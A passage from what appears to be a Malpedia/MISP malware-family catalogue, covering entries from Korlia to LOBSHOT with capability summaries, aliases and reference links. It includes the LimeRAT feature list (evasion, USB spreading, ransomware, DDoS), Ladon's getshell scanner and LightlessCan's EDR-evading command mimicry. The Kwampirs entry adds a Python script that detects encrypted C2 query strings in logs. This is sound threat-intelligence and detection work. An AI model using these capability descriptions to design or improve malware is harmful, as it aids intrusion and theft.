https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf

https://www.bleepingcomputer.com/news/security/hackers-take-over-diplomats-email-target-russian-deputy-minister/

https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/

https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/

https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html

Korlia

The tag is: misp-galaxy:malpedia="Korlia"

Korlia is also known as:

  • Bisonal

Table 3838. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html

https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md

https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/

https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/

https://www.secureworks.com/research/threat-profiles/bronze-huntley

https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf

https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment

https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf

http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

https://asec.ahnlab.com/1298

https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf

https://www.youtube.com/watch?v=_fstHQSK-kk

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf

https://securitykitten.github.io/2014/11/25/curious-korlia.html

https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/

https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/

https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf

https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf

Kovter

Kovter started as police ransomware and later turned into ad-fraud (click-fraud) malware. Timeline of its evolution:

  • Feb 2012 - Police ransomware

  • Aug 2013 - Became ad-fraud malware

  • Mar 2014 - Transition from ransomware to ad-fraud malware

  • June 2014 - Distributed from the Sweet Orange exploit kit

  • Dec 2014 - Ran affiliated node

  • Apr 2015 - Spread via the Fiesta and Nuclear Pack exploit kits

  • May 2015 - Kovter became fileless

  • 2016 - Malvertising campaign targeting Chrome and Firefox

  • June 2016 - Change in persistence mechanism

  • July 2017 - Nemucod and Kovter packed together

  • Jan 2018 - Cylance report on its persistence

The tag is: misp-galaxy:malpedia="Kovter"

Kovter is also known as:

Table 3839. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter

https://www.cybereason.com/blog/how-click-fraud-commodity-malware-transforms-into-an-advanced-threat

https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf

https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/

https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md

https://0xchrollo.github.io/articles/unpacking-kovter-malware/

https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless

KPOT Stealer

KPOT is an information-stealing Trojan horse that can steal information from infected computers. It is distributed through phishing emails and malicious websites. Once executed on a computer, KPOT can steal passwords, credit card numbers, and other personal information.

The tag is: misp-galaxy:malpedia="KPOT Stealer"

KPOT Stealer is also known as:

  • Khalesi

  • Kpot

Table 3840. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer

https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal

https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/

https://isc.sans.edu/diary/26010

https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md

https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/

https://isc.sans.edu/diary/25934

https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware

https://news.drweb.com/show/?i=13242&lng=en

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd

Krachulka

According to ESET, this malware family is a banking trojan and was active in Brazil until the middle of 2019. Its most noticeable characteristic was its usage of well-known cryptographic methods to encrypt strings, as opposed to the majority of Latin American banking trojans that mainly use custom encryption schemes.

The tag is: misp-galaxy:malpedia="Krachulka"

Krachulka is also known as:

Table 3841. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krachulka

https://www.welivesecurity.com/2021/12/15/dirty-dozen-latin-america-amavaldo-zumanek/

KrakenKeylogger

KrakenKeylogger is a .NET-based infostealer sold on underground hacking forums.

The tag is: misp-galaxy:malpedia="KrakenKeylogger"

KrakenKeylogger is also known as:

Table 3843. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krakenkeylogger

https://0xtoxin.github.io/malware%20analysis/KrakenKeylogger-pt1/

https://0xtoxin.github.io/threat%20hunting/KrakenKeylogger-pt2/

KrBanker

ThreatPost describes KRBanker (Blackmoon) as a banking Trojan designed to steal user credentials from various South Korean banking institutions. It was discovered in early 2014 and since then has adopted a variety of infection and credential stealing techniques.

The tag is: misp-galaxy:malpedia="KrBanker"

KrBanker is also known as:

  • BlackMoon

Table 3844. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker

https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/

https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan

https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/

http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/

https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html

KrDownloader

The tag is: misp-galaxy:malpedia="KrDownloader"

KrDownloader is also known as:

Table 3845. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader

Kronos

Kronos is a banking Trojan that first emerged in 2014, built to steal banking credentials from customers of targeted financial institutions. It is spread mainly through phishing campaigns and exploit kits. Once installed on a victim's computer, it captures login credentials, card details and other personal information by keylogging and form grabbing, and it includes techniques for defeating two-factor authentication. Kronos uses evasion techniques against antivirus detection and has been actively maintained and updated over time; it has targeted a wide range of banking systems and affected numerous organizations worldwide, and it remains a relevant threat to online banking.

The tag is: misp-galaxy:malpedia="Kronos"

Kronos is also known as:

  • Osiris

Table 3846. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos

https://www.proofpoint.com/us/threat-insight/post/kronos-reborn

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack

https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses

https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/

https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware

https://twitter.com/3xp0rtblog/status/1294157781415743488

https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/

https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/

https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/

https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf

https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/

https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/

https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html

https://unit42.paloaltonetworks.com/banking-trojan-techniques/

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/

https://intel471.com/blog/privateloader-malware

https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/

https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan

KryptoCibule

The tag is: misp-galaxy:malpedia="KryptoCibule"

KryptoCibule is also known as:

Table 3847. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kryptocibule

https://www.welivesecurity.com/2020/09/02/kryptocibule-multitasking-multicurrency-cryptostealer/

Kuaibu

The tag is: misp-galaxy:malpedia="Kuaibu"

Kuaibu is also known as:

  • Barys

  • Gofot

  • Kuaibpy

Table 3849. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8

Kuluoz

The tag is: misp-galaxy:malpedia="Kuluoz"

Kuluoz is also known as:

Table 3850. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz

Kutaki

Cofense characterizes Kutaki as a data stealer that uses old-school techniques to detect sandboxes and debugging. Kutaki however works quite well against unhardened virtual machines and other analysis devices. By backdooring a legitimate application, it can fool unsophisticated detection methodologies.

The tag is: misp-galaxy:malpedia="Kutaki"

Kutaki is also known as:

Table 3852. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki

https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/

Kwampirs

Kwampirs is a family of malware that spreads over SMB. It typically will not execute or deploy in environments where no reachable ADMIN$ share is available. It is a fully featured backdoor that can download additional modules. Its typical C2 traffic is HTTP, with the URI containing "q=[ENCRYPTED DATA]".
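The "q=[ENCRYPTED DATA]" pattern in the URI is the kind of thing a detection engineer turns into a proxy-log hunt. The script below is an added example, not code from Malpedia or from any Kwampirs report: it parses constructed proxy log lines (client, method, URL), pulls the q parameter from each URL and flags values that are long, drawn from a single encoding alphabet and high in Shannon entropy, which is what an encrypted or encoded blob looks like and what a human search query does not. The log format, the thresholds and the opaque sample value (derived from a hash so the sample is deterministic) are all assumptions of this example.

```python
import base64
import hashlib
import math
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log lines ("client method url"), not real traffic. The second
# line carries a long opaque value in "q=", built here from a hash so that the
# sample is deterministic; it stands in for "q=[ENCRYPTED DATA]".
_OPAQUE = base64.urlsafe_b64encode(
    hashlib.sha256(b"constructed sample").digest()).decode().rstrip("=")
SAMPLE_LOG = (
    "10.0.0.5 GET http://www.google.com/search?q=kwampirs+orangeworm\n"
    f"10.0.0.7 GET http://203.0.113.10/index.php?q={_OPAQUE}\n"
    "10.0.0.9 GET http://intranet.example/page?id=42\n"
    "10.0.0.7 GET http://203.0.113.10/index.php?q=short\n"
)

# Characters produced by hex, base64 and URL-safe base64 encoders.
_ENCODED_CHARS = re.compile(r"^[A-Za-z0-9+/=_-]+$")


def shannon_entropy(value: str) -> float:
    """Bits per character: ~0 for a repeated character, ~4-5 for ciphertext."""
    if not value:
        return 0.0
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_encrypted(value: str, min_len: int = 32, min_entropy: float = 3.5) -> bool:
    """Heuristic: long, single-alphabet, high-entropy strings. Thresholds are assumptions."""
    return (len(value) >= min_len
            and _ENCODED_CHARS.match(value) is not None
            and shannon_entropy(value) >= min_entropy)


def find_suspicious_q_requests(log_text: str) -> list:
    """Return the requests whose 'q' query parameter looks like an encrypted blob."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash the hunt
        client, method, url = parts
        split = urlsplit(url)
        # parse_qs decodes '+' to a space, so a real search query fails the alphabet check
        for value in parse_qs(split.query, keep_blank_values=True).get("q", []):
            if looks_encrypted(value):
                hits.append({"client": client, "method": method,
                             "host": split.hostname, "q_length": len(value)})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_q_requests(SAMPLE_LOG):
        print(hit)
```

Search engines and many web applications also use a q parameter, so in production this belongs behind an allowlist of known search hosts and should be scored against the destination (bare IP, rare host) rather than used as a stand-alone alert.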

The tag is: misp-galaxy:malpedia="Kwampirs"

Kwampirs is also known as:

Table 3853. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs

http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/

https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html

https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat

https://resources.cylera.com/new-evidence-linking-kwampirs-malware-to-shamoon-apts

https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/

https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/

Ladon

According to its self-description, Ladon is a multi-threaded, plugin-based scanning tool for large-scale network penetration, covering port scanning, service identification, network asset discovery, password brute-forcing, high-risk vulnerability detection and one-click getshell. It supports batch scanning of /8, /16 and /24 ranges and cross-segment scanning, as well as scanning from URL, host and domain name lists.

The tag is: misp-galaxy:malpedia="Ladon"

Ladon is also known as:

Table 3854. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ladon

https://asec.ahnlab.com/en/47455/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://asec.ahnlab.com/en/56236/

https://github.com/k8gege/Ladon

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

LambLoad

According to Microsoft, this is a downloader used in a supply chain attack involving a malicious variant of an application developed by CyberLink. It is centered around a legitimate CyberLink application installer that has been modified to include malicious code that downloads, decrypts, and loads a second-stage payload. The file, which was signed using a valid certificate issued to CyberLink Corp., is hosted on legitimate update infrastructure owned by CyberLink and includes checks to limit the time window for execution and evade detection by security products.

The tag is: misp-galaxy:malpedia="LambLoad"

LambLoad is also known as:

  • OfficeCertTea

Table 3857. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload

https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://securelist.com/the-lazarus-group-deathnote-campaign/109490/

https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/

Lamdelin

The tag is: misp-galaxy:malpedia="Lamdelin"

Lamdelin is also known as:

Table 3858. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin

http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/

LatentBot

FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.

Using Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.

The tag is: misp-galaxy:malpedia="LatentBot"

LatentBot is also known as:

Table 3860. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot

https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access

http://malware-traffic-analysis.net/2017/04/25/index.html

https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/

https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/

https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html

Laturo Stealer

The tag is: misp-galaxy:malpedia="Laturo Stealer"

Laturo Stealer is also known as:

Table 3861. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo

https://seclists.org/snort/2019/q3/343

LazarLoader

The tag is: misp-galaxy:malpedia="LazarLoader"

LazarLoader is also known as:

Table 3863. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader

https://asec.ahnlab.com/ko/53832/

https://securelist.com/bluenoroff-methods-bypass-motw/108383/

LDR4

A further branch of the URSNIF collection of malware families. According to Mandiant, it no longer has focus on banking fraud but generic backdoor capabilities instead.

The tag is: misp-galaxy:malpedia="LDR4"

LDR4 is also known as:

Table 3868. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4

https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud

Leakthemall

Ransomware.

The tag is: misp-galaxy:malpedia="Leakthemall"

Leakthemall is also known as:

Table 3869. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall

https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html

Lemon Duck

Lemon Duck is Monero crypto-mining malware with the capability to spread rapidly across an entire network. It runs its payload mainly in memory. Internal network spreading is performed through the SMB RCE vulnerability CVE-2017-0144 (EternalBlue) or through brute-force attacks.

The tag is: misp-galaxy:malpedia="Lemon Duck"

Lemon Duck is also known as:

Table 3871. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lemonduck

https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/

https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/

https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/

https://therecord.media/lemonduck-botnet-evolves-to-allow-hands-on-keyboard-intrusions/

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer-a-ransomware-and-a-botnet-join-the-part.html

https://cybotsai.com/lemon-duck-attack/

https://www.bitdefender.com/files/News/CaseStudies/study/373/Bitdefender-PR-Whitepaper-LemonDuck-creat4826-en-EN-GenericUse.pdf

https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/

https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/

https://notes.netbytesec.com/2021/06/lemon-duck-cryptominer-technical.html

https://success.trendmicro.com/solution/000261916

https://asec.ahnlab.com/en/31811/

https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728

https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

Lethic

Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.

The tag is: misp-galaxy:malpedia="Lethic"

Lethic is also known as:

Table 3873. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic

http://resources.infosecinstitute.com/win32lethic-botnet-analysis/

http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html

http://www.malware-traffic-analysis.net/2017/11/02/index.html

LetMeOut

The tag is: misp-galaxy:malpedia="LetMeOut"

LetMeOut is also known as:

Table 3874. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.letmeout

http://blog.nsfocus.net/murenshark/

LgoogLoader

LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.

The tag is: misp-galaxy:malpedia="LgoogLoader"

LgoogLoader is also known as:

Table 3875. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lgoogloader

https://inside.harfanglab.io/blog/articles/cyber-threat-intelligence/loader-galore-taskloader-at-the-start-of-a-pay-per-install-infection-chain/

https://blog.polyswarm.io/nullmixer-drops-multiple-malware-families

LIGHTBUNNY

The tag is: misp-galaxy:malpedia="LIGHTBUNNY"

LIGHTBUNNY is also known as:

Table 3877. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightbunny

https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated

LightlessCan

LightlessCan is a complex HTTP(S) RAT, that is a successor of the Lazarus RAT named BlindingCan.

In Q2 2022 and Q1 2023, it was deployed in targeted attacks against an aerospace company in Spain and a technology company in India.

Besides supporting the commands already present in BlindingCan, its most significant update is the mimicked functionality of many native Windows commands:

  • ipconfig

  • net

  • netsh advfirewall firewall

  • netstat

  • reg

  • sc

  • ping (both IPv4 and IPv6)

  • wmic process call create

  • nslookup

  • schtasks

  • systeminfo

  • arp

These native commands are often abused by attackers once they have a foothold on the target system. LightlessCan executes them discreetly within the RAT itself rather than visibly through the system console. This provides stealth against both real-time monitoring solutions such as EDRs and post-mortem digital forensic tools, since no console process is spawned.

LightlessCan uses RC6 to decrypt its configuration and to encrypt and decrypt its network traffic.

The tag is: misp-galaxy:malpedia="LightlessCan"

LightlessCan is also known as:

Table 3878. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

Lightning Stealer

Lightning Stealer can target 30+ Firefox and Chromium-based browsers and steal crypto wallets, Telegram data, Discord tokens, and Steam user data. Unlike other info stealers, Lightning Stealer stores all the stolen data in JSON format for exfiltration.

The tag is: misp-galaxy:malpedia="Lightning Stealer"

Lightning Stealer is also known as:

Table 3880. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightning_stealer

https://blog.cyble.com/2022/04/05/inside-lightning-stealer/

LIGHTWORK

According to Mandiant, LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP. It crafts configurable IEC-104 ASDU messages to change the state of RTU IOAs to ON or OFF. This sample works in tandem with PIEHOP, which sets up the execution.

The tag is: misp-galaxy:malpedia="LIGHTWORK"

LIGHTWORK is also known as:

Table 3881. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork

https://www.mandiant.com/resources/blog/cosmicenergy-ot-malware-russian-response

Ligsterac

The tag is: misp-galaxy:malpedia="Ligsterac"

Ligsterac is also known as:

Table 3882. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac

https://securelist.com/atm-infector/74772/

http://atm.cybercrime-tracker.net/index.php

limedownloader

The tag is: misp-galaxy:malpedia="limedownloader"

limedownloader is also known as:

Table 3884. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limedownloader

https://github.com/NYAN-x-CAT/Lime-Downloader

limeminer

The tag is: misp-galaxy:malpedia="limeminer"

limeminer is also known as:

Table 3885. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer

https://github.com/NYAN-x-CAT/Lime-Miner

LimeRAT

Simple yet powerful RAT for Windows machines. This project is simple and easy to understand; it should give you general knowledge about .NET malware and how it behaves.

Main Features

  • .NET: Coded in Visual Basic .NET; the client requires the .NET Framework 2.0 or 4.0, and the server requires 4.0

  • Connection: Uses pastebin.com to obtain the ip:port instead of noip.com DNS, and also supports multiple ports

  • Plugin: Uses a plugin system to decrease the stub’s size and lower AV detection

  • Encryption: The communication between server and client is encrypted with AES

  • Spreading: Infects all files and folders on USB drives

  • Bypass: Low AV detection and undetected startup method

  • Lightweight: Payload size is about 25 KB

  • Anti Virtual Machines: Uninstalls itself if the machine is virtual, to avoid scanning or analysis

  • Ransomware: Encrypts files on all HDD and USB drives with the .Lime extension

  • XMR Miner: High performance Monero CPU miner with user idle/active optimizations

  • DDoS: Creates a powerful DDoS attack to make an online service unavailable

  • Crypto Stealer: Steals cryptocurrency-sensitive data

  • Screen-Locker: Prevents the user from accessing their Windows GUI

  • And more: On Connect Auto Task, Force enable Windows RDP, Persistence, File manager, Passwords stealer, Remote desktop, Bitcoin grabber, Downloader, Keylogger

The tag is: misp-galaxy:malpedia="LimeRAT"

LimeRAT is also known as:

Table 3887. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat

https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service

https://blog.reversinglabs.com/blog/rats-in-the-library

https://blog.yoroi.company/research/limerat-spreads-in-the-wild/

https://www.youtube.com/watch?v=x-g-ZLeX8GM

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt

https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns

https://felipetarijon.github.io/2022-12-12-limerat-infecting-unskilled-threat-actors/

https://lab52.io/blog/apt-c-36-recent-activity-analysis/

https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/

https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html

https://any.run/cybersecurity-blog/limerat-malware-analysis/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html

https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html

https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf

https://github.com/NYAN-x-CAT/Lime-RAT/

Limitail

The tag is: misp-galaxy:malpedia="Limitail"

Limitail is also known as:

Table 3888. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail

LinseningSvr

The tag is: misp-galaxy:malpedia="LinseningSvr"

LinseningSvr is also known as:

Table 3889. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr

https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

LiteDuke

According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. ESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.

The tag is: misp-galaxy:malpedia="LiteDuke"

LiteDuke is also known as:

Table 3892. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke

https://norfolkinfosec.com/looking-back-at-liteduke/

https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/

LiteHTTP

According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system.

The source is on GitHub: https://github.com/zettabithf/LiteHTTP

The tag is: misp-galaxy:malpedia="LiteHTTP"

LiteHTTP is also known as:

Table 3893. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp

https://viriback.com/recent-litehttp-activities-and-iocs/

https://malware.news/t/recent-litehttp-activities-and-iocs/21053

https://github.com/zettabithf/LiteHTTP

LOBSHOT

According to PCrisk, LOBSHOT is a type of malware with a feature called hVNC (Hidden Virtual Network Computing) that allows attackers to access a victim’s computer without being noticed. The hVNC component is effective in evading fraud detection systems. Also, LOBSHOT is being used to carry out financial crimes through the use of banking trojan and information-stealing functionalities.

The tag is: misp-galaxy:malpedia="LOBSHOT"

LOBSHOT is also known as:

Table 3894. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.lobshot

